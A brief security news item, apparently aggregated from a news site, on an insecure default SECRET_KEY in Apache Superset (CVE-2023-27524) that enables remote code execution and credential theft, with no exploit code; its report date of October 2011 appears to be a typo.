Common insecure configuration opens Apache Superset servers to compromise

2023-04-26 13:51

An insecure default configuration issue makes most internet-facing Apache Superset servers vulnerable to attackers, Horizon3.

Administrators in charge of Apache Superset instances should check whether they are among that lot, upgrade them to a fixed version, and check whether attackers might have exploited the weakness to breach them.

Apache Superset is a data exploration and visualization platform that's usually integrated with a variety of databases.

"We found reliable paths to remote code execution across different Superset versions in a variety of configurations. Remote code execution is possible both on databases connected to Superset and the Superset server itself. We also found a host of methods for harvesting credentials. These credentials include Superset user password hashes and database credentials, both in plaintext and in a reversible format."

The researchers reported the flaw back in October 2011 and the Apache Superset team addressed it by changing the default SECRET KEY and adding a warning to users about the necessity of changing it to a random, complex one.

The warning went unheeded by many: the researchers recently swept the Internet with Shodan to see how many Apache Superset setups there are out there with this insecure configuration, and found that two-thirds instances were using a default key.

News URL

https://www.helpnetsecurity.com/2023/04/26/apache-superset-insecure-configuration-cve-2023-27524/

#apache #compromise #server

Related vendor

VENDOR	LAST 12M	#/PRODUCTS	LOW	MEDIUM	HIGH	CRITICAL	TOTAL VULNS
Apache		281	13	544	711	366	1634